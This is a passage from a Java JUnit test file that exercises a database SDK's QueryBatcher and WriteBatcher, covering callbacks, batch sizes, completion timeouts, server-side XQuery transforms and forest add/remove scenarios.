batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // create query def String combinedQuery = "{\"search\":" + "{\"query\":{\"value-constraint-query\":{\"constraint-name\":\"id\", \"text\":\"0026\"}}," + "\"options\":{\"return-metrcs\":false, \"return-qtext\":false, \"debug\":true, \"transorm-results\":{\"apply\":\"raw\"}," + "\"constraint\":{\"name\":\"id\", \"value\":{\"element\":{\"ns\":\"\", \"name\":\"id\"}}}}}}"; System.out.println("QUERY IS : "+ combinedQuery); // create a handle for the search criteria StringHandle rawHandle = new StringHandle(combinedQuery); rawHandle.setFormat(Format.JSON); QueryManager queryMgr = client.newQueryManager(); // create a search definition based on the handle 
RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str).append('|'); } batchResults.append(batch.getJobResultsSoFar()) .append('|') .append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); Forest forest = throwable.getForest(); batchFailResults.append("Test has Exceptions") .append('|') .append(throwable.getForestResultsSoFar()) .append('|') /*.append(throwable. getJobRecordNumber()) .append('|') .append(throwable.getBatchRecordNumber()) .append('|') .append(throwable.getSourceUri()) .append('|') .append(throwable.getMimetype()) .append('|') */ .append(forest.getForestName()) .append('|') .append(forest.getHost()) .append('|') .append(forest.getDatabaseName()) .append('|') /*.append(forest.isDeleteOnly()) .append('|')*/ .append(forest.isUpdateable()); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if( !batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { // Write out and assert on query failures. System.out.println("Exception Buffer contents on Query Exceptions received from callback onQueryFailure"); System.out.println(batchFailResults.toString()); // Remove this failure once there are no NPEs and doa asserts on various counters in failure scenario. fail("Test failed due to exceptions"); } } } /* * To test QueryBatcher's callback support by invoking the client object to do a lookup * Insert only one document to validate the functionality * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherCallbackClient() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherCallbackClient"); String[] filenames = {"constraint1.json"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); batcher.add("contraints1.json", contentHandle1); // Flush batcher.flushAndWait(); StringBuffer batchFailResults = new StringBuffer(); String expectedStr = "Vannevar Bush wrote an article for The Atlantic Monthly"; QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("Vannevar"); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.withBatchSize(1000); //Hold for contents read back from callback client. StringBuffer ccBuf = new StringBuffer(); queryBatcher1.onUrisReady(batch-> { // Do a lookup back into the database with the client and batch content. // Want to verify if the client object can be utilized from a Callback. 
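// batch.getClient() hands back the DatabaseClient the batcher was created from, so the callback can read the matched document directly. Because onUrisReady runs on the batcher's worker threads, the content is copied into ccBuf and asserted later on the main JUnit thread.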
JSONDocumentManager docMgr = batch.getClient().newJSONDocumentManager(); JacksonHandle jh = new JacksonHandle(); docMgr.read(batch.getItems()[0], jh); System.out.println("JH Contents is " + jh.get().toString()); System.out.println("Batch Contents is " + batch.getItems()[0]); ccBuf.append(jh.get().toString()); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions").append('|'); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if( !batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { // Write out and assert on query failures. System.out.println("Exception Buffer contents on Query Exceptions received from callback onQueryFailure"); System.out.println(batchFailResults.toString()); fail("Test failed due to exceptions"); } System.out.println("Contents from the callback are : " + ccBuf.toString()); // Verify the Callback contents. assertTrue("Lookup for a document from Callback using the client failed", ccBuf.toString().contains(expectedStr)); } } /* * Test to validate QueryBatcher when there is no data. * No search results are returned. */ @Test public void testQueryBatcherWithNoData() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherWithNoData"); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); // Run a QueryBatcher when no results are returned. QueryBatcher queryBatcherNoResult = dmManager.newQueryBatcher(querydef); StringBuilder batchNoResults = new StringBuilder(); StringBuilder batchNoFailResults = new StringBuilder(); queryBatcherNoResult.onUrisReady(batch -> { for (String str : batch.getItems()) { batchNoResults.append(str).append('|'); } }); queryBatcherNoResult.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure when no results returned"); // Should be empty in a successful run. Else fill the buffer to report error. batchNoFailResults.append("Test has Exceptions"); batchNoFailResults.append("|"); }); JobTicket jobTicketNoRes = dmManager.startJob(queryBatcherNoResult); queryBatcherNoResult.awaitCompletion(30, TimeUnit.SECONDS); if (queryBatcherNoResult.isStopped()) { assertTrue("Query returned no results when there is no data" , batchNoResults.toString().isEmpty()); } } /* * To test query by example with WriteBatcher and QueryBatcher * 1) Verify batch size on QueryBatcher. 
* * * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherBatchSize() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherBatchSize"); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 1K documents for (int i = 0; i < 1000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuffer batchResults = new StringBuffer(); StringBuffer batchFailResults = new StringBuffer(); // Run a QueryBatcher with a large AwaitTermination. QueryBatcher queryBatcherbatchSize = dmManager.newQueryBatcher(querydef); queryBatcherbatchSize.withBatchSize(20); Calendar calBef = Calendar.getInstance(); long before = calBef.getTimeInMillis(); queryBatcherbatchSize.onUrisReady(batch-> { batchResults.append(batch.getJobBatchNumber()).append('|'); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherbatchSize.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions") .append('|'); }); JobTicket jobTicket = dmManager.startJob(queryBatcherbatchSize); // Make sure to modify TimeUnit.TIMEUNIT.Method(duration) below before the assert queryBatcherbatchSize.awaitCompletion(3, TimeUnit.MINUTES); Calendar calAft; long after = 0L; long duration = 0L; long queryJobTimeoutValue = 0L; while(!queryBatcherbatchSize.isStopped()) { // do nothing. } // Check the time of termination calAft = Calendar.getInstance(); after = calAft.getTimeInMillis(); duration = after - before; queryJobTimeoutValue = TimeUnit.MINUTES.toSeconds(duration); if (queryBatcherbatchSize.isStopped()) { System.out.println("Duration is ===== " + queryJobTimeoutValue); System.out.println(batchResults.toString()); assertEquals("Number of batches should have been 50", batchResults.toString().split("\\|").length, 50); } //Clear the contents for next query host batcher object results. batchResults.delete(0, (batchResults.capacity() -1)); batchFailResults.delete(0, (batchFailResults.capacity() -1)); // Run a QueryBatcher with a small AwaitTermination. 
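// With only a 5 millisecond awaitCompletion window, the main thread is expected to resume long before the job finishes; the isStopped() branch below will normally be skipped, so this block mainly exercises the timeout path.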
QueryBatcher queryBatcherSmallTimeout = dmManager.newQueryBatcher(querydef); queryBatcherSmallTimeout.withBatchSize(1000); queryBatcherSmallTimeout.onUrisReady(batch-> { batchResults.append(batch.getJobBatchNumber()).append('|'); System.out.println("QueryBatcher with 1000 batch size - Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherSmallTimeout.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions").append('|'); batchFailResults.append(throwable.getJobBatchNumber()); }); JobTicket jobTicketTimeout = dmManager.startJob(queryBatcherSmallTimeout); queryBatcherSmallTimeout.awaitCompletion(5, TimeUnit.MILLISECONDS); if (queryBatcherSmallTimeout.isStopped()) { System.out.println(batchResults.toString()); assertNotEquals("Number of batches should not have been 1", batchResults.toString().split("\\|").length, 5); } if (batchFailResults!= null && !batchFailResults.toString().isEmpty()) { assertTrue("Exceptions not found when query time out value reached", batchFailResults.toString().contains("Test has Exceptions")); } } /* * To test query by example with WriteBatcher and QueryBatcher * 1) Verify awaitTermination method on QueryBatcher. * * * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherFailures() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherFailures"); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 10 K documents for (int i = 0; i < 10000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher with AwaitTermination. 
QueryBatcher queryBatcherAwait = dmManager.newQueryBatcher(querydef); Calendar calBef = Calendar.getInstance(); long before = calBef.getTimeInMillis(); JobTicket jobTicket = dmManager.startJob(queryBatcherAwait); // Make sure to modify TimeUnit.MILLISECONDS.Method(duration) below before the assert queryBatcherAwait.awaitCompletion(30, TimeUnit.SECONDS); queryBatcherAwait.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcherAwait.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions") .append('|'); }); Calendar calAft; long after = 0L; long duration = 0L; long quertJobTimeoutValue = 0L; while(!queryBatcherAwait.isStopped()) { // do nothing } // Check the time of termination calAft = Calendar.getInstance(); after = calAft.getTimeInMillis(); duration = after - before; quertJobTimeoutValue = TimeUnit.MILLISECONDS.toSeconds(duration); if (queryBatcherAwait.isStopped()) { System.out.println("Duration is " + quertJobTimeoutValue); if (quertJobTimeoutValue >= 30 && quertJobTimeoutValue < 35) { assertTrue("Job termination with awaitTermination passed within specified time", quertJobTimeoutValue >= 30 && quertJobTimeoutValue < 35); } else if (quertJobTimeoutValue > 35) { fail("Job termination with awaitTermination failed"); } } } @Test public void testServerXQueryTransform() throws IOException, ParserConfigurationException, SAXException, TransformerException, InterruptedException, XPathExpressionException { System.out.println("Running testServerXQueryTransform"); String transformFileDir = dataConfigDirPath + "/transforms/"; TransformExtensionsManager transMgr = client.newServerConfigManager().newTransformExtensionsManager(); ExtensionMetadata metadata = new ExtensionMetadata(); metadata.setTitle("Adding attribute xquery Transform"); metadata.setDescription("This plugin transforms an XML document by adding attribute to root node"); metadata.setProvider("MarkLogic"); metadata.setVersion("0.1"); // get the transform file from add-attr-xquery-transform.xqy File transformFile = new File(transformFileDir +"add-attr-xquery-transform.xqy"); FileHandle transformHandle = new FileHandle(transformFile); transMgr.writeXQueryTransform("add-attr-xquery-transform", transformHandle, metadata); ServerTransform transform = new ServerTransform("add-attr-xquery-transform"); transform.put("name", "Lang"); transform.put("value", "English"); String xmlStr1 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><foo>This is so foo</foo>"; String xmlStr2 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><foo>This is so bar</foo>"; //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(5); batcher.withTransform(transform); StringHandle handleFoo = new StringHandle(); handleFoo.set(xmlStr1); StringHandle handleBar = new StringHandle(); handleBar.set(xmlStr2); String uri = null; // Insert 10 documents for (int i = 0; i < 10; i++) { uri = "foo" + i + ".xml"; batcher.add(uri, handleFoo); } for (int i = 0; i < 10; i++) { uri = "bar" + i + ".xml"; batcher.add(uri, handleBar); } // Flush batcher.flushAndWait(); StringBuffer batchResults = new StringBuffer(); StringBuffer batchFailResults = new StringBuffer(); // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("foo OR bar"); // Run a QueryBatcher on the new URIs. 
QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.withBatchSize(5); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str); batchResults.append("|"); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); if (queryBatcher1.isStopped()) { // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Query results URI list length returned after transformation incorrect", res.length, 20); // Get a random URI, since the URIs returned are not ordered. Get the 3rd URI. assertTrue("URI returned not correct", res[2].contains("foo") || res[2].contains("bar")); // do a lookup with the first URI using the client to verify transforms are done. DOMHandle readHandle = readDocumentUsingDOMHandle(client, res[0], "XML"); String contents = readHandle.evaluateXPath("/foo/text()", String.class); // Verify that the contents are of xmlStr1 or xmlStr2. System.out.println("Contents are : " + contents); assertTrue("Lookup for a document from Callback using the client failed", xmlStr1.contains(contents) || xmlStr2.contains(contents)); } // release client client.release(); } /* * To test QueryBatcher functionality (errors if any) when a Forest is being removed and added during a start job. * * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherWithForestRemoveAndAdd() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherWithForestRemoveAndAdd"); String testMultipleDB = "QBMultipleForestDB"; String[] testMultipleForest = {"QBMultipleForestDB-1", "QBMultipleForestDB-2", "QBMultipleForestDB-3"}; try { //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); setupAppServicesConstraint(testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 20K documents to have a sufficient large query seek time for (int i = 0; i < 20000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuffer batchResults = new StringBuffer(); StringBuffer batchFailResults = new StringBuffer(); // Run a QueryBatcher with AwaitTermination. 
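// 20,000 matching documents at a batch size of 2,000 should produce 10 URI batches (every inserted document uses the same jsonDoc, so all of them match "John AND Bob"); the later check for batch number 10 relies on that arithmetic.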
QueryBatcher queryBatcherAddForest = dmManager.newQueryBatcher(querydef); queryBatcherAddForest.withBatchSize(2000); queryBatcherAddForest.onUrisReady(batch-> { batchResults.append(batch.getJobBatchNumber()) .append('|'); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherAddForest.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions") .append('|') .append(throwable.getMessage()); }); JobTicket jobTicket = dmManager.startJob(queryBatcherAddForest); queryBatcherAddForest.awaitCompletion(3, TimeUnit.MINUTES); // Now add a Forests to the database. createForest(testMultipleForest[1], testMultipleDB); createForest(testMultipleForest[2], testMultipleDB); while(!queryBatcherAddForest.isStopped()) { // Do nothing. Wait for batcher to complete. } if (queryBatcherAddForest.isStopped()) { if (batchResults!= null && !batchResults.toString().isEmpty()) { System.out.print("Results from onUrisReady === "); System.out.print(batchResults.toString()); // We should be having 10 batches numbered 1 to 10. assertTrue("Batches not complete in results", batchResults.toString().contains("10")); } if (batchFailResults!= null && !batchFailResults.toString().isEmpty()) { System.out.print("Results from onQueryFailure === "); System.out.print(batchFailResults.toString()); assertTrue("Exceptions not found when forest added", batchFailResults.toString().contains("Test has Exceptions")); } } // Reomove a forest. StringBuffer batchResultsRem = new StringBuffer(); StringBuffer batchFailResultsRem = new StringBuffer(); // Run a QueryBatcher with AwaitTermination. QueryBatcher queryBatcherRemoveForest = dmManager.newQueryBatcher(querydef); queryBatcherRemoveForest.withBatchSize(2000); queryBatcherRemoveForest.onUrisReady(batch-> { batchResultsRem.append(batch.getJobBatchNumber()) .append('|'); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherRemoveForest.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResultsRem.append("Test has Exceptions"); batchFailResultsRem.append("|"); batchFailResultsRem.append(throwable.getMessage()); }); JobTicket jobTicketRem = dmManager.startJob(queryBatcherRemoveForest); queryBatcherRemoveForest.awaitCompletion(3, TimeUnit.MINUTES); // Now remove a Forest from the database. detachForest(testMultipleDB, testMultipleForest[2]); deleteForest(testMultipleForest[2]); while(!queryBatcherRemoveForest.isStopped()) { // Do nothing. Wait for batcher to complete. } if (queryBatcherRemoveForest.isStopped()) { if (batchResultsRem!= null && !batchResultsRem.toString().isEmpty()) { System.out.print("Results from onUrisReady === "); // We should be having 10 batches numbered 1 to 10. //TODO Add rest of the validations when feature complete. System.out.print(batchResultsRem.toString()); assertTrue("Batches not complete in results when forest removed", batchResultsRem.toString().contains("10")); } if (batchFailResultsRem!= null && !batchFailResultsRem.toString().isEmpty()) { System.out.print("Results from onQueryFailure === "); System.out.print(batchFailResultsRem.toString()); assertTrue("Exceptions not found when forest removed", batchFailResultsRem.toString().contains("Test has Exceptions")); } } } catch(Exception e) { System.out.print(e.getMessage()); } finally { // Associate back the original DB. 
try { associateRESTServerWithDB(restServerName, dbName); } catch (Exception e) { // TODO Auto-generated catch block e.printStackTrace(); } detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); //In case something asserts detachForest(testMultipleDB, testMultipleForest[2]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); deleteForest(testMultipleForest[2]); Thread.sleep(10000); } } /* * To test QueryBatcher's callback support with long lookup timefor the client object to do a lookup * Insert documents to validate the functionality. * Induce a long pause which exceeds awaitTermination time. * * @throws IOException * @throws InterruptedException */ @Test public void testBatchClientLookupTimeout() throws IOException, InterruptedException { System.out.println("Running testBatchClientLookupTimeout"); String testMultipleDB = "QBMultipleForestDB"; String[] testMultipleForest = {"QBMultipleForestDB-1"}; try { //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 2K documents to have a sufficient large query seek time for (int i = 0; i < 20000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuffer batchFailResults = new StringBuffer(); StringBuilder ccBuf = new StringBuilder(); // Run a QueryBatcher with AwaitTermination. QueryBatcher queryBatcherAddForest = dmManager.newQueryBatcher(querydef); queryBatcherAddForest.withBatchSize(200); queryBatcherAddForest.onUrisReady(batch-> { // Check only once if (ccBuf.toString().isEmpty()) { JSONDocumentManager docMgr = batch.getClient().newJSONDocumentManager(); JacksonHandle jh = new JacksonHandle(); docMgr.read(batch.getItems()[0], jh); try { // Simulate a large time in reading back the results Thread.sleep(40000); } catch (Exception e) { // TODO Auto-generated catch block System.out.println(e.getMessage()); } ccBuf.append(jh.get().toString().trim()); // The first read should exhaust the awaitTermination timeout. Buffer contains only one result. System.out.println("JH Contents is " + jh.get().toString()); System.out.println("Batch Contents is " + batch.getItems()[0]); } batchResults.append(batch.getJobBatchNumber()); batchResults.append("|"); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherAddForest.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions"); batchFailResults.append("|"); batchFailResults.append(throwable.getMessage()); }); // Have a small awaitCompletion timeout for the batcher. 
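// The 40 second sleep inside the first onUrisReady callback outlives the 30 second awaitCompletion below, so the main thread is expected to resume before any batch number has been appended; that is what the empty batchResults assertion at the end of the try block relies on.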
JobTicket jobTicket = dmManager.startJob(queryBatcherAddForest); queryBatcherAddForest.awaitCompletion(30, TimeUnit.SECONDS); if (queryBatcherAddForest.isStopped()) { if (batchFailResults!= null && !batchFailResults.toString().isEmpty()) { System.out.print("Results from onQueryFailure === "); System.out.print(batchFailResults.toString()); assertTrue("Exceptions not found when forest added", batchFailResults.toString().contains("Test has Exceptions")); } } assertTrue("Batches are available in results when they should not be.", batchResults.toString().isEmpty()); } catch(Exception e) { System.out.print(e.getMessage()); } finally { // Associate back the original DB. try { associateRESTServerWithDB(restServerName, dbName); } catch (Exception e) { // TODO Auto-generated catch block e.printStackTrace(); } detachForest(testMultipleDB, testMultipleForest[0]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); Thread.sleep(10000); } } /* * To test QQueryBatcher when WriteBatcher writes same document. Simulate a deadlock / resource contention. * @throws IOException * @throws InterruptedException */ /*public void testSimultaneousBothBatcherAccess() throws IOException, InterruptedException { System.out.println("Running testSimultaneousBothBatcherAccess"); clearDB(restServerPort); String[] filenames = {"constraint1.json", "constraint2.json", "constraint3.json", "constraint4.json", "constraint5.json"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); StringBuilder writebatchResults = new StringBuilder(); batcher.add("/batcher-contraints1.json", contentHandle1); batcher.add("/batcher-contraints2.json", contentHandle2); batcher.add("/batcher-contraints3.json", contentHandle3); batcher.add("/batcher-contraints4.json", contentHandle4); batcher.add("/batcher-contraints5.json", contentHandle5); // Flush batcher.flushAndWait(); StringBuffer querybatchResults = new StringBuffer(); StringBuilder querybatchFailResults = new StringBuilder(); // get the query File file = new File(dataConfigDirPath + "qbe1.json"); FileHandle fileHandle = new FileHandle(file); QueryManager queryMgr = client.newQueryManager(); RawQueryByExampleDefinition qbyexDef = queryMgr.newRawQueryByExampleDefinition(fileHandle.withFormat(Format.JSON)); // Run a QueryBatcher. 
QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(qbyexDef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { querybatchResults.append(str) .append('|'); } querybatchResults.append(batch.getForestResultsSoFar()) .append('|') .append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); querybatchFailResults.append("Test has Exceptions"); querybatchFailResults.append(throwable.getMessage()); } ); // Trying to use a WriteBatcher on the same docId. WriteBatcher batcherTwo = dmManager.newWriteBatcher(); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; StringHandle handle = new StringHandle(); handle.set(jsonDoc); // Update contents to same doc uri. batcherTwo.withBatchSize(1); batcherTwo.add("/batcher-contraints11.json", handle); batcherTwo.flushAndWait(); JobTicket jobTicketWriteTwo = dmManager.startJob(batcherTwo); JobTicket jobTicket = dmManager.startJob(queryBatcher1); queryBatcher1.awaitTermination(1, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if( !querybatchFailResults.toString().isEmpty() && querybatchFailResults.toString().contains("Exceptions")) { System.out.println("Query Batch Failed - Buffer Contents are:" + querybatchFailResults.toString()); fail("Test failed due to exceptions"); } if( querybatchResults != null && !querybatchResults.toString().isEmpty()) { // Verify the batch results now. String[] res = querybatchResults.toString().split("\\|"); assertTrue("URI returned not correct", res[0].contains("/batcher-contraints1.json")); assertEquals("Bytes Moved","0", res[1]); assertEquals("Batch Number","0", res[3]); } } }*/ @Test public void testQueryBatcherJobDetails() throws Exception { String testMultipleDB = "QHBJobDetaitDB"; String[] testMultipleForest = {"QHBJobDetaitDB-1"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testQueryBatcherJobDetails"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionName = "absRangeConstraintWithVariousGrammarAndWordQueryOpt.xml"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); setQueryOption(clientTmp, queryOptionName); QueryManager queryMgr = clientTmp.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("0012"); //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManagerTmp.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. 
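// With withBatchSize(2), every second add() below should be flushed to the server as one write batch; the flushAndWait() call afterwards writes any remaining partial batch and blocks until all writes have completed.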
String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuilder batchDetails = new StringBuilder(); StringBuilder forestDetails = new StringBuilder(); StringBuilder jobDetails = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); // Batch details batchDetails.append(batch.getJobBatchNumber()) .append('|') .append(batch.getJobResultsSoFar()) .append('|') .append(batch.getForestBatchNumber()); // Get the Forest details Forest forest = batch.getForest(); forestDetails.append(forest.getDatabaseName()) .append('|') .append(forest.getHost()) .append('|') .append(forest.getForestName()); // Get the Job details /*jobDetails.append(batch.getJobTicket().getJobId()) .append('|') .append(batch.getJobTicket().getJobType().name());*/ } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); 